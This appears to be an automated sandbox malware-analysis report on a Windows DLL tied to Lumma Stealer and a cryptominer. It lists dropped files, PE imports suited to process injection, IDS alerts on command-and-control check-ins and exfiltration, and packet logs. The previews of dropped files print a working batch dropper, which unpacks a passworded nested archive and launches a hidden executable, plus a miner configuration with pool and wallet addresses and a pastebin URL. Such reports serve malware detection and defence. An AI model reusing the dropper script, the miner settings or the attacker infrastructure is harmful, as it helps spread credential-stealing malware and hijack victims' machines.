                                                                                                                                                                                                            Preview:PK........Rn.Yh.2..E!..E!.....file_11.zip.aO.Y.......9m.X..v..&....j^..U.........9>..&....;.M.B.....>Ez...(..v..........X.<..._..f.o?..l...?../s .-...u.m.i.!%.E.@w...do/.W/..=.#.....Lde...QQN....Cu..w..P.d....Y..2z.I.f$DUo}WA.....h[....H4....b..`...k.#....fo..g..UA.....j..;......N.?...[..+.|.Ob....W...iS3...6.......fJ.......[.u!.BW.OH..:9..*/_....O.!]...@....{V.....}.T.I.C"...X+_V*.s.|V..o....$;Cr...V....?.5b..g..x.C.a...k1..n..,2..6....}....Q....gq3U.X......].w..T.buX..!.?..Q......_`.....K..B.........b......U...bqA..F+....cf5....,.I.m......qu...#..%.k.....AH.K..:..zq.~.....h...L6.8L;...6..l....Vr.3.,....w(.mj..b...Kf...u...M..V..IV.-.....G+......h[I.Vs...U.5...c':..u..3S...'@.[...;.L...4f.].D.A..TB....P.'.l.X....o...n......l.+..8b.dN.Y...`.@.r.j.i)...K+:.Tr.:<W...L.@.}.......Y.A/.bf.N......-L...X....R.:.n.cq.........&..h|.5.m..z.........y.d..>...Q#..p.7..6.C....Q.l...R..O.'!.,...'...|Y~.`*$.D..kSD...kdl%x...T2Uo..<.......q}"......}Rzw..Y..u
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):476
                                                                                                                                                                                                            Entropy (8bit):5.09690163183538
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:QUp+CF16g64CTFMj2LIQLvvk7WYCVGrMLvmuCCgXjgrXgX78agXrrEOXUigXY:QUpNF16g632Ckevk7WYCVGYTtS0rXS7Y
                                                                                                                                                                                                            MD5:A6D611790D8AFE6E81448CDF6DDB9EA4
                                                                                                                                                                                                            SHA1:4E402E68FC7130433A7004CBCE3834A8743BCF4C
                                                                                                                                                                                                            SHA-256:0C7BE4C51CD64A8B6D2235EE0EEAB8C98C565ED9B74B50C0EBA02750C3B24B2F
                                                                                                                                                                                                            SHA-512:2FAA6DE4F3E2872FE2575F775C282E17FAFB5AD4C31EB1DE118081F80F28B33E0C1ACFEC0779B5911314BA50A5A5C1EC11491A393C272F3EAB943636A6BF4938
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p29586644319935208542739921766 -oextracted ..for /l %%i in (11,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "Installer.exe" ../..cd....rd /s /q extracted..attrib +H "Installer.exe"..start "" "Installer.exe"..cls..echo Launched 'Installer.exe'...pause..del /f /q "Installer.exe"..
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):344
                                                                                                                                                                                                            Entropy (8bit):5.684574010345154
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAKZ:uwgyXmGwgyoH55GT2Qtyc3n1KAi
                                                                                                                                                                                                            MD5:FAC0827324A254D56B80351D3A0A676C
                                                                                                                                                                                                            SHA1:7140E81D0844422A4F1EB9C083D0E3F8B195CC89
                                                                                                                                                                                                            SHA-256:A12A06E88A3E1AD525A1F9D10227CF015C516705094DBEEC67BB1275B36064D1
                                                                                                                                                                                                            SHA-512:F84F82A35500701F6E80D926399B9C21B287A4A13981E7B646A26AAA831E53335EBF832ACAB367D01A778F1A35A0336C62938F66800D51CB2E00577113EEE122
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/dq3hWX27..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):345
                                                                                                                                                                                                            Entropy (8bit):5.046538254653124
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioB4Dc8NmVSTgqF1AivwtHgN6qFfpap1tNGpKoip:pMpDh5RwXlCfTgqFyYw7qJA1tNGkoC
                                                                                                                                                                                                            MD5:5155BABB04DC876A4871112BA3AC2716
                                                                                                                                                                                                            SHA1:F7A7E8D917F4B829610ED476A51BE9096CF66918
                                                                                                                                                                                                            SHA-256:DA8B2175AEE6D2B8300AF87F89FBD77114349B41852CFCA04446CE7BCA990CB2
                                                                                                                                                                                                            SHA-512:C1A54C1BFC5E493B18C138D964112EC95ACEA7BD9F20F2971F666F6B152DA723A4B999118381FEC8D42F31B6D5F4A0ABA9F684800E0ECA4079A1BD2391D6CD59
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 511531 bytes (500 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 511531.... 0%. .Everything is Ok....Size: 625464..Compressed: 511531..
                                                                                                                                                                                                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.044295392882363
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:n7ZKbApaa3.dll
                                                                                                                                                                                                            File size:411'136 bytes
                                                                                                                                                                                                            MD5:26c9a2ed08569a57d6b33a1f884f6aa7
                                                                                                                                                                                                            SHA1:02f05f0d48ddb7cfe071ddfd0740ed4c5c6e3cb7
                                                                                                                                                                                                            SHA256:0633330e8156219a811ac8e36dffb340c8843df3cc74036f746779f833327cd2
                                                                                                                                                                                                            SHA512:75469d772397b3a70e3757d47d270301c0f3698a01bbf5b2671594bbcf7da2d682e7ab4ebda29311894fd6110250acd8927273907831768861b5a8a9329c6d35
                                                                                                                                                                                                            SSDEEP:6144:R9wunmxnL8yszTL0Z1ADqs1F/ur6okpw3Mn5TtK8cINnoqwG8HbN:R9wune8xTq1ADlVn3kbN
                                                                                                                                                                                                            TLSH:1D94BF80950EC7EBDA7BDE32B08BD282491AF53FD940C55A6F3659A6D31CCD9480C6CB
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>3.._]]._]]._]].'^\._]].'X\._]].'Y\._]].'\\._]]..&]._]]._\]._]]..X\._]]..Y\._]]..^\._]]._]]._]]..]\._]].._\._]]Rich._]].......
                                                                                                                                                                                                            Icon Hash:7ae282899bbab082
                                                                                                                                                                                                            Entrypoint:0x100082b1
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x10000000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                            Time Stamp:0x672F0420 [Sat Nov 9 06:41:36 2024 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:59ff7bf9e1f2497a887caad90dd0df97
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                                                                                            jne 00007F298CC382A7h
                                                                                                                                                                                                            call 00007F298CC38429h
                                                                                                                                                                                                            push dword ptr [ebp+10h]
                                                                                                                                                                                                            push dword ptr [ebp+0Ch]
                                                                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                                                                            call 00007F298CC38153h
                                                                                                                                                                                                            add esp, 0Ch
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            retn 000Ch
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            push 00000000h
                                                                                                                                                                                                            call dword ptr [10014050h]
                                                                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                                                                            call dword ptr [1001404Ch]
                                                                                                                                                                                                            push C0000409h
                                                                                                                                                                                                            call dword ptr [10014018h]
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            call dword ptr [10014054h]
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            sub esp, 00000324h
                                                                                                                                                                                                            push 00000017h
                                                                                                                                                                                                            call dword ptr [10014058h]
                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                            je 00007F298CC382A7h
                                                                                                                                                                                                            push 00000002h
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            int 29h
                                                                                                                                                                                                            mov dword ptr [10064E10h], eax
                                                                                                                                                                                                            mov dword ptr [10064E0Ch], ecx
                                                                                                                                                                                                            mov dword ptr [10064E08h], edx
                                                                                                                                                                                                            mov dword ptr [10064E04h], ebx
                                                                                                                                                                                                            mov dword ptr [10064E00h], esi
                                                                                                                                                                                                            mov dword ptr [10064DFCh], edi
                                                                                                                                                                                                            mov word ptr [10064E28h], ss
                                                                                                                                                                                                            mov word ptr [10064E1Ch], cs
                                                                                                                                                                                                            mov word ptr [10064DF8h], ds
                                                                                                                                                                                                            mov word ptr [10064DF4h], es
                                                                                                                                                                                                            mov word ptr [10064DF0h], fs
                                                                                                                                                                                                            mov word ptr [10064DECh], gs
                                                                                                                                                                                                            pushfd
                                                                                                                                                                                                            pop dword ptr [10064E20h]
                                                                                                                                                                                                            mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                            mov dword ptr [10064E14h], eax
                                                                                                                                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                            mov dword ptr [00064E18h], eax
                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x19a000x7c.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x19a7c0x50.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000x1120.reloc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x18f100x1c.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x18e500x40.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x140000x158.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x12d430x12e00b233419517d970bd80c85ccc7a27c560False0.5227002276490066data6.67255734843468IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rdata0x140000x62660x64002922123e33e9f1d5623d898ad64bb181False0.413984375data4.892852693422662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .data0x1b0000x4a76c0x49e00867a97fcd786282a37b2b8c106721edaFalse0.5506622779187818data6.852865365369387IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .reloc0x660000x11200x1200718165393b10b8d0a3e31e83ce1a95c5False0.7569444444444444data6.440238813551561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            USER32.dllShowWindow
                                                                                                                                                                                                            ntdll.dllNtResumeThread, NtSetContextThread, NtCreateThreadEx, NtReadVirtualMemory, NtWriteVirtualMemory, NtAllocateVirtualMemory, NtGetContextThread, RtlUnwind
                                                                                                                                                                                                            KERNEL32.dllEncodePointer, WriteConsoleW, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetModuleHandleA, K32GetModuleInformation, GetModuleFileNameA, CreateFileA, CreateFileMappingA, CloseHandle, MapViewOfFile, VirtualProtect, GetModuleHandleW, GetConsoleWindow, VirtualAlloc, CreateProcessW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, WriteFile, FlushFileBuffers, InterlockedFlushSList, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, DecodePointer, RaiseException, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle
                                                                                                                                                                                                            NameOrdinalAddress
                                                                                                                                                                                                            WindowsHandle10x10004370
                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-11-14T12:19:26.943414+01002057360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pragapin .sbs)1192.168.2.10594351.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:27.021061+01002057346ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (repostebhu .sbs)1192.168.2.10540031.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:27.048602+01002057354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thinkyyokej .sbs)1192.168.2.10550821.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:27.080611+01002057338ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ducksringjk .sbs)1192.168.2.10526201.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:27.105185+01002057340ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explainvees .sbs)1192.168.2.10620491.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:27.129637+01002057334ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brownieyuz .sbs)1192.168.2.10528841.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:27.155239+01002057348ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rottieud .sbs)1192.168.2.10529471.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:27.180272+01002057344ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (relalingj .sbs)1192.168.2.10553361.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:27.206024+01002057350ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tamedgeesy .sbs)1192.168.2.10536171.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:28.099910+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049794104.102.49.254443TCP
                                                                                                                                                                                                            2024-11-14T12:19:28.101526+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049793104.102.49.254443TCP
                                                                                                                                                                                                            2024-11-14T12:19:28.728959+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.1049794104.102.49.254443TCP
                                                                                                                                                                                                            2024-11-14T12:19:28.744377+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.1049793104.102.49.254443TCP
                                                                                                                                                                                                            2024-11-14T12:19:28.860579+01002057415ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com)1192.168.2.10570281.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:29.461435+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.1049789TCP
                                                                                                                                                                                                            2024-11-14T12:19:29.656887+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049802188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:29.656887+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049802188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:29.659001+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049803188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:29.659001+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049803188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:30.762640+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049803188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:30.762640+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049803188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:30.795891+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049802188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:30.795891+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049802188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:30.960384+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049814104.102.49.254443TCP
                                                                                                                                                                                                            2024-11-14T12:19:31.478233+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049816188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:31.478233+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049816188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:31.496127+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049818188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:31.496127+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049818188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:31.561533+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.1049814104.102.49.254443TCP
                                                                                                                                                                                                            2024-11-14T12:19:33.432190+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049818188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:33.432190+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049818188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:33.436165+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049816188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:33.436165+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049816188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:34.410278+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049835188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:34.410278+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049835188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:34.941754+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049839188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:34.941754+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049839188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:40.521903+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049867188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:40.521903+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049867188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:42.869997+01002057415ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com)1192.168.2.10635191.1.1.153UDP
                                                                                                                                                                                                            2024-11-14T12:19:43.416747+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049883188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:43.416747+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049883188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:43.482312+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049887188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:43.482312+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049887188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:46.363351+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049903188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:46.363351+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049903188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:46.838915+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049904188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:46.838915+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049904188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:48.321902+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049914188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:48.321902+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049914188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:48.386896+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049915188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:48.386896+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049915188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:48.814861+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049914188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:50.115623+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049926188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:50.115623+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049926188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:51.951371+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049934188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:51.951371+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049934188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:53.708804+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049945188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:53.708804+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049945188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:56.158833+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049934188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:19:56.158971+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049945188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-14T12:20:09.185130+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.1049992TCP
                                                                                                                                                                                                            2024-11-14T12:20:17.515654+01002829056ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download2192.168.2.1049995147.45.47.8180TCP
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.248018026 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.248068094 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.248159885 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.249624968 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.249640942 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.254904985 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.254945040 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.255029917 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.256031990 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:27.256047010 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.099814892 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.099910021 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.101457119 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.101526022 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.104109049 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.104115963 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.104141951 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.104151964 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.104403019 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.104577065 CET44349794104.102.49.254192.168.2.10
